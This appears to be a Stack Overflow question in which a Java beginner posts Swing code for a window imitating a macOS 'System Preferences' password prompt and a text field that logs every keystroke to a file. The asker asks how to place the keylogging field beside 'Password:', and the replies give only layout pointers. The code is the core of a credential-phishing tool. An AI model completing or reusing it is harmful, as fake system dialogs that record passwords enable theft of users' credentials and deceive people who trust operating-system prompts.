# Unable to add textfield next to text using JTextField

Tags: java, swing, jtextfield

So, I've never programmed a thing in Java before today and I'm trying to draw a window with text, and image, and text fields.

Here's the code I have for the window/text: http://pastebin.com/HfUGht2J

```
import java.awt.*;

import javax.swing.*;

public class text extends JPanel{
   public void paint(Graphics g) {
      Graphics2D g2 = (Graphics2D)g;
      g2.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
      RenderingHints.VALUE_ANTIALIAS_ON);
      Font font = new Font("Helvetica", Font.BOLD, 13);
      g2.setFont(font);
      g2.drawString("System Preferences is trying to unlock .PDF", 96, 34);
      g2.drawString("preferences. Type your password to allow this.", 96, 51);
      Font font2 = new Font("Helvetica", Font.PLAIN, 13);
      g2.setFont(font2);
      g2.drawString("Username:", 98, 100);
      g2.drawString("Password:", 100, 130);
   }

   public static void main(String[] args) {
      JFrame f = new JFrame();
         f.getContentPane().add(new text());
         f.setSize(443, 232);
         f.setLocationRelativeTo(null);    
         f.setVisible(true);
   }
}
```

Here's the code I have for the textfield/keylogger: http://pastebin.com/XyE1dLsq

```
import java.awt.BorderLayout;
import java.awt.event.*;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.awt.Font;
import java.awt.Graphics;
import java.awt.Graphics2D;
import java.awt.RenderingHints;

import javax.swing.*;
import java.awt.*;

/**
 * This Class opens a simple text area using JFrame and prints the typed key in a log file.
 *
 */
public class KeyEventDemo 
        implements KeyListener
{     
    /** 
     * @param args defaultargs
     */
    public static void main(String[] args) {
         JTextField typingArea;
            JFrame f=new JFrame();
         f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
         typingArea = new JTextField(20);
         typingArea.addKeyListener(new KeyEventDemo());        
         f.getContentPane().add(typingArea, BorderLayout.PAGE_START);          
         f.pack();
         f.setVisible(true);
    }

    /** Triggers on the key pressed event and displays the typed key in the log */
    public void keyTyped(KeyEvent e) {
        try {
          String keyString;
          keyString = "key character = '" + e.getKeyChar() + "'";  
          //For system print console
          System.out.println(keyString);
          //For output to file
          File a =new File("E:\\projects\\KeyLog.log");
          if (!a.exists()) {
                a.createNewFile();
            }
          FileWriter fw = new FileWriter(a.getAbsoluteFile(),true);
          BufferedWriter bw = new BufferedWriter(fw);
          bw.append(keyString);
          bw.newLine();
          bw.close();         
        } catch (Exception e1) {        
            e1.printStackTrace();
        }
      }

    /** Triggers on the key pressed event */
    public void keyPressed(KeyEvent e) {

    }

    /** Triggers on the key released event */
    public void keyReleased(KeyEvent e) {

    }
 }
```

How do I:

a) implement the one regular textfield into the window next to "Username:"

b) implement the key logger text field into the window next to "Password:"

c) add an image to the left of it all.

Comment: For this you should read [Layouts in java](https://docs.oracle.com/javase/tutorial/uiswing/layout/visual.html)

Comment: Please edit your question to include a [mcve] that focuses on a single problem and shows your current approach.

Answer (score 0):

From the pallete window while in the design window drag jtextfield and drop it just next to the label u want. Then at the source window u can change the values of the textfields u ve added to null or "". This would create your textfields. For a logger i would prefer a button and rename it to 'log in'. You can do this by right clicking the button and selecting the edit option.

Comment: For questions that ask how to to something in the code, I would expect the answer to provide some code samples. If the solution is only described as you did it, I usually go for a comment on the question.